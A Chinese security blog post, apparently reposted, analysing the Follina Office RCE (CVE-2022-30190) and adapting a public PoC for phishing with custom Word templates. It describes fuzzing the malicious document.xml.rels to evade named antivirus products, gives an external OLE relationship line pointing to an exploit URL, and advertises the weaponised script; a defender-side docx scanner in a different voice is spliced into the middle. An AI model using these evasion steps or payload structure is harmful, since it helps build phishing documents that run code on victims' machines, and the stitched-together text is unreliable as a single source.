CVE-2022-30190 Follina Office RCE analysis [with custom Word template POC]
2022-06-26 23:26:00 【st3pby】
Technical communication
Follow the WeChat official account Z20 Security team and reply "Add group" to be pulled into the group to discuss technology together.

This post is copied from the official account, so the layout may be a bit messy; you can read it on the official account instead.

Two days ago I took a look at the 'Follina' MS-MSDT n-day Microsoft Office RCE vulnerability and modified chvancooten's script so that the Word template can be customized, which is convenient for phishing in practice: edit the phishing Word document yourself and then specify it with the -f parameter.
1、Reproduction
Using the https://github.com/chvancooten/follina.py project to generate the malicious Word file, command execution can be achieved, but Tencent PC Manager and Huorong both detect it.

2、POC analysis
There are mainly two parts. One is a new document.xml.rels file added under the word/_rels directory of the Word document, which contains a window.location.href that loads the remote connection.

In the remote HTML, the ms-msdt:/ protocol is used.

Finally, the files are compressed and packaged into a docx.
3、Fuzz
The first
After analysis, the only change is to the document.xml.rels file under word/_rels of the Word document.
An empty document cannot be used in practice, so I created a new file, added some content, unzipped it, put document.xml.rels in, and compressed it back; it did not trigger.
The second
The generated clickme.docx triggers repeatedly without modification, but as soon as it is modified it no longer triggers.
The third
Changing the document.xml.rels file name does not work; it is still detected.
The fourth: fuzzing the content
It is the external request that gets detected; the word http is flagged.
Changing `mhtml:http://localhost:80/exploit.html!x-usc:http://localhost:80/exploit.html` to `http://localhost:80/exploit.html!`
then works.
But we should use our own Word template, otherwise the victim will notice that something is wrong when opening it. So, to be closer to real-world use, I modified the script so that the Word template can be customized.
4、Re-analysis
4.1、Word structure and POC analysis

Word file structure:

```
.
├── [Content_Types].xml   // describes the content of the whole document; combines each XML file into a whole
├── _rels                 // defines the relationship between the Package (zip package) and the Parts it directly contains.
│                         // If a Part depends on other Parts, a directory must be created for that Part, also containing
│                         // a _rels directory with a partname.rels file; /word/document.xml is a typical example
├── docProps              // records the main attribute information of the docx document
│   ├── app.xml           // document type, version, read-only, sharing, security attributes and other information
│   └── core.xml          // creation time, title, subject and author: general file attributes of the Open XML document format
└── word
    ├── _rels
    │   └── document.xml.rels
    ├── charts
    │   ├── _rels
    │   │   ├── chart1.xml.rels   // location of the text box file in the mapping table
    │   ├── chart1.xml
    │   ├── colors1.xml
    │   ├── colors2.xml
    │   ├── style1.xml
    │   ├── style2.xml
    ├── document.xml      // content and properties of all visible text, and of the invisible parts, in the document
    ├── embeddings
    │   ├── Microsoft_Excel_Worksheet.xlsx
    │   ├── Microsoft_Excel_Worksheet1.xlsx
    │   ├── oleObject1.bin   // OLE is short for Object Linking and Embedding; it lets users add data in different
    │   │                    // formats (text, images, audio, etc.) to a document, i.e. it creates compound documents
    │   ├── oleObject2.bin
    │   ├── oleObject3.bin
    │   ├── oleObject4.bin
    ├── endnotes.xml
    ├── fontTable.xml     // font information used in the document
    ├── footer1.xml
    ├── footer2.xml
    ├── footnotes.xml     // footnote information in the document
    ├── header1.xml
    ├── header2.xml
    ├── media             // multimedia files in the Word document, such as inserted pictures and the wmf files of formulas
    │   ├── image1.emf
    │   ├── image2.png
    │   ├── image3.jpeg
    │   ├── image4.wmf
    │   ├── image5.emf
    ├── numbering.xml     // ordered and unordered lists in the Word document: list style, numbering and other information
    ├── settings.xml      // general setting information of the document
    ├── styles.xml        // Word style information: display priority of styles, paragraph, table and other styles
    ├── theme             // all information about the document theme, such as colors and font sizes
    │   ├── theme1.xml
    │   ├── themeOverride1.xml
    │   └── themeOverride2.xml
    └── webSettings.xml   // style information such as left and right spacing of the document
```
From the Word directory structure we learn that word/document.xml is the body of the file.
[Content_Types].xml stores the part names and types.
Every part is an XML file. If a part references an external file, a _rels folder must be created in the current directory, and the rels file holding the external references is placed in it. The POC uses an external reference in document.xml.

The template in the POC script uses rId 1337, which is controlled in document.xml; in the modification below it is changed to 1111.

Then, after document.xml.rels is modified correspondingly, it can be used.

4.2、About the document content
After understanding the Word structure, if you want to customize the file content, that is, create a template, it is enough to modify document.xml.
Fill in the following parts:


Then add one line of external reference to the corresponding xxx.xml.rels file, being careful that the rId matches:

```xml
<Relationship Id="rId1111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="http://localhost:80/exploit!" TargetMode="External"/>
```

The custom template below then triggers the vulnerability.
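As an added example (not the post's script and not follina.py), here is a defender-side Python check for the package structure described in 4.1 and 4.2: it opens a .docx as a zip, lists every relationship with TargetMode="External", flags the ones that pull an OLE object from a remote host or use the mhtml:/ms-msdt: schemes, and reports any r:id used in word/document.xml that word/_rels/document.xml.rels does not declare (the rId mismatch the post says to watch for). The three sample packages are constructed inline and are far smaller than real Word output; the flagged relationship is the line quoted above.

```python
"""Scan a .docx for external relationships of the kind the post describes.

Added example, not the post's script or follina.py. Only the standard library
is used; the sample packages at the bottom are constructed for this example.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
REL_TAG = "{%s}Relationship" % REL_NS
OLE_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
HYPERLINK_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"


def is_suspicious(rel_type, target):
    """True for targets that reach out of the package the way the post's POC does."""
    t = (target or "").lower()
    if t.startswith(("mhtml:", "ms-msdt:")):   # mhtml wrapper or the msdt protocol handler
        return True
    # an OLE object normally lives inside the package; one fetched over http(s) does not
    return rel_type == OLE_TYPE and t.startswith(("http:", "https:"))


def external_relationships(docx_bytes):
    """(part, rId, type, target) for every relationship with TargetMode="External"."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            for rel in ET.fromstring(zf.read(name)).iter(REL_TAG):
                if rel.get("TargetMode") == "External":
                    hits.append((name, rel.get("Id"), rel.get("Type"), rel.get("Target")))
    return hits


def suspicious_relationships(docx_bytes):
    """(part, rId, target) for each external relationship that is_suspicious() flags."""
    return [(part, rid, target)
            for part, rid, rtype, target in external_relationships(docx_bytes)
            if is_suspicious(rtype, target)]


def dangling_rids(docx_bytes):
    """rIds used in word/document.xml that word/_rels/document.xml.rels does not declare."""
    rels_name = "word/_rels/document.xml.rels"
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        doc = zf.read("word/document.xml").decode("utf-8", "replace")
        rels = zf.read(rels_name) if rels_name in zf.namelist() else b""
    declared = {r.get("Id") for r in ET.fromstring(rels).iter(REL_TAG)} if rels else set()
    used = set(re.findall(r'\br:(?:id|embed|link)="([^"]+)"', doc))
    return sorted(used - declared)


# ---- constructed sample packages (minimal, not real Word output) ----
CONTENT_TYPES = ('<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
                 '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
                 '<Default Extension="xml" ContentType="application/xml"/></Types>')
ROOT_RELS = ('<Relationships xmlns="%s"><Relationship Id="rId1" '
             'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" '
             'Target="word/document.xml"/></Relationships>' % REL_NS)
DOC_BODY = ('<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" '
            'xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">'
            '<w:body><w:p><w:r>%s</w:r></w:p></w:body></w:document>')


def build_docx(document_xml, document_rels):
    """Pack a minimal docx in memory so the checks above can run offline."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", CONTENT_TYPES)
        zf.writestr("_rels/.rels", ROOT_RELS)
        zf.writestr("word/document.xml", document_xml)
        zf.writestr("word/_rels/document.xml.rels", document_rels)
    return buf.getvalue()


# benign: an ordinary hyperlink to the web and nothing else
BENIGN_DOCX = build_docx(
    DOC_BODY % '<w:hyperlink r:id="rId2"><w:t>link</w:t></w:hyperlink>',
    '<Relationships xmlns="%s"><Relationship Id="rId2" Type="%s" '
    'Target="https://example.com/" TargetMode="External"/></Relationships>' % (REL_NS, HYPERLINK_TYPE))

# the relationship line quoted in the post: an OLE object fetched from a remote host
POC_DOCX = build_docx(
    DOC_BODY % '<w:object><o:OLEObject r:id="rId1111"/></w:object>',
    '<Relationships xmlns="%s"><Relationship Id="rId1111" Type="%s" '
    'Target="http://localhost:80/exploit!" TargetMode="External"/></Relationships>' % (REL_NS, OLE_TYPE))

# document.xml still uses rId1337 while the rels file declares nothing: the mismatch the post warns about
MISMATCH_DOCX = build_docx(
    DOC_BODY % '<w:object><o:OLEObject r:id="rId1337"/></w:object>',
    '<Relationships xmlns="%s"/>' % REL_NS)

if __name__ == "__main__":
    for label, blob in (("benign", BENIGN_DOCX), ("poc", POC_DOCX), ("mismatch", MISMATCH_DOCX)):
        print(label, suspicious_relationships(blob), dangling_rids(blob))
```

The check reads every `.rels` part in the package rather than only `word/_rels/document.xml.rels`, because the post's third experiment renames that file; a relationship that points outside the package is what matters, not the part name it sits in. Ordinary hyperlinks are left alone so that the check does not fire on every document that links to a web page.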

4.3、Static AV evasion

Online scan test

Finally, I wrote a script for the custom Word template:


Reply "CVE-2022-30190" in the official account backend to get the download link.
